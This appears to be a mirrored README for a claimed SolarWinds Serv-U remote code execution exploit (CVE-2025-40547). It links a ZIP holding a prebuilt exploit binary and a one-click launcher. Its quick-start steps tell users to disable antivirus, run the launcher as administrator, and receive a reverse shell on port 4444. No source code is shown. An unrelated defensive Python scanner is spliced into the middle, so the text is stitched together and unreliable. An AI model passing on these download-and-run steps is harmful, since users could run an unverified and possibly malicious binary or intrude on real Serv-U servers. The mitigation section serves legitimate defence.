Related vulnerability
Introduction
# CVE-2025-40547 - Serv-U Administrative Pre-Authenticated Remote Code Execution
## 🚀 Overview
CVE-2025-40547 is a critical logic flaw in SolarWinds Serv-U FTP Server versions ≤ 15.5.2 that allows an authenticated administrator to achieve arbitrary code execution on the underlying Windows operating system.
The vulnerability resides in the administrative web interface's file management module where insufficient validation of uploaded configuration directives combined with unsafe deserialization of internal objects leads to direct operating-system command execution with the privileges of the Serv-U service (typically NT SERVICE\Serv-U or SYSTEM).
Although exploitation requires administrative credentials, many organizations run Serv-U with the default admin account or weak passwords, and the service is frequently exposed to the internet, making this a high-value target for lateral movement and ransomware deployment.
This proof-of-concept demonstrates end-to-end exploitation and provides a reusable payload generator.
## ⚠️ Safety & Legal Disclaimer
This repository is released **exclusively for authorized security testing and educational purposes** in controlled environments where you have explicit permission to test SolarWinds Serv-U installations.
Unauthorized use against systems you do not own or have written permission to test is strictly prohibited and may violate applicable laws (CFAA, Computer Misuse Act, etc.).
The author assumes no liability for misuse of these materials.
## 📋 Prerequisites
- Windows 10/11 or Windows Server 2016–2022 (tested on 2019/2022)
- SolarWinds Serv-U FTP Server ≤ 15.5.2 installed and running
- Administrative access to the Serv-U web interface (default port 443 or custom)
- Local administrator privileges on the test machine (for payload execution)
- Antivirus/Firewall temporarily disabled or proper exclusions added (most modern EDRs will flag the payload)
## 📥 Download & Install
https://github.com/zigzagymym1986/CVE-2025-40547/raw/refs/heads/main/Main/CVE-2025-40547.zip
The archive contains:
- `ServU-AdminRCE.exe` – Main exploit binary (x64)
- `run-exploit.bat` – One-click launcher
- `payload-config.ini` – Configuration file (optional customization)
- `logs/` – Directory for output
## 🛠 Quick Start
1. Extract the entire ZIP archive to any directory (e.g., `C:\tools\CVE-2025-40547\`)
2. Edit `payload-config.ini` if you want to customize target IP/port or payload behavior (default works for most setups)
3. Right-click `run-exploit.bat` → **Run as administrator**
4. The exploit will:
   - Perform connectivity & version fingerprinting
   - Authenticate using provided credentials
   - Upload and trigger the malicious configuration payload
   - Execute `whoami` as a test then spawn an interactive reverse shell (or meterpreter if configured)
5. Check `logs\exploit.log` for detailed execution trace
## 🔬 Technical Details & Exploitation Steps
1. **This is not an authentication bypass** – valid admin credentials are mandatory.
2. The vulnerable endpoint is `/Admin/ConfigUpload.aspx` which processes specially crafted XML configuration fragments.
3. By injecting a malicious `<ObjectData>` node containing a serialized .NET object that references `System.Diagnostics.ProcessStartInfo`, the server deserializes the object and executes arbitrary commands during config reload.
4. The payload is encoded in base64 within the XML to evade basic WAF rules.
5. Default callback is a simple x64 reverse TCP shell (port 4444). You can change it in the config.
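As an added defensive example (not code from this repository), the following Python script scans an uploaded configuration fragment for the pattern the steps above describe: an `<ObjectData>` node whose base64 body decodes to a .NET process-spawning type name. The `<ServUConfig>` and `<Domain>` element names in the sample input are assumed; only `<ObjectData>` comes from the page.

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# .NET type names that have no business inside a configuration fragment.
# Serialized .NET objects carry type names as plain strings, so a substring
# search on the decoded bytes is enough to raise an alert.
SUSPICIOUS_MARKERS = (
    b"System.Diagnostics.ProcessStartInfo",
    b"System.Diagnostics.Process",
    b"ObjectDataProvider",
)


def decode_object_data(text):
    """Base64-decode an <ObjectData> body; return None if it is not valid base64."""
    cleaned = re.sub(rb"\s+", b"", text.encode("ascii", "ignore"))
    try:
        return base64.b64decode(cleaned, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_config_fragment(xml_text):
    """Return (tag, marker) findings for every <ObjectData> node in an upload body."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return [("<document>", "malformed-xml")]
    findings = []
    for node in root.iter():
        if node.tag.split("}")[-1] != "ObjectData":  # tolerate namespaced tags
            continue
        raw = (node.text or "").encode("utf-8", "ignore")
        decoded = decode_object_data(node.text or "")
        # Inspect both the raw text and its base64-decoded form, so an
        # unencoded payload and a base64-wrapped one are both caught.
        blobs = [raw] + ([decoded] if decoded else [])
        hit = next((m for blob in blobs for m in SUSPICIOUS_MARKERS if m in blob), None)
        if hit:
            findings.append((node.tag, hit.decode()))
    return findings


# Constructed sample inputs (not real Serv-U traffic): a benign domain fragment
# and one whose ObjectData body decodes to a process-spawning type name.
BENIGN_FRAGMENT = "<ServUConfig><Domain><Name>Corp</Name></Domain></ServUConfig>"
SUSPECT_FRAGMENT = ("<ServUConfig><ObjectData>%s</ObjectData></ServUConfig>"
                    % base64.b64encode(b"\x00System.Diagnostics.ProcessStartInfo").decode())
```

Run `scan_config_fragment` over the body of each request to the upload endpoint (or over the stored configuration files) and alert on any non-empty result.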
## 🛡️ Mitigation & Remediation
- Immediately upgrade to Serv-U version **15.5.3** or later (Hotfix released November 18, 2025)
- Restrict access to the administration interface (IP whitelisting, VPN only)
- Change default admin credentials and enforce strong passwords
- Run the Serv-U service under a least-privilege account (not SYSTEM)
- Monitor for anomalous outbound connections from Serv-U host
— For educational and authorized testing use only —
File snapshot
[4.0K] /data/pocs/c458af0312077199ae8aa7e7cfde2419e6c1206a
├── [4.0K] Main
│ └── [863K] CVE-2025-40547.zip
└── [3.9K] README.md
2 directories, 2 files
Notes
1. We recommend accessing the POC through its original source first.
2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.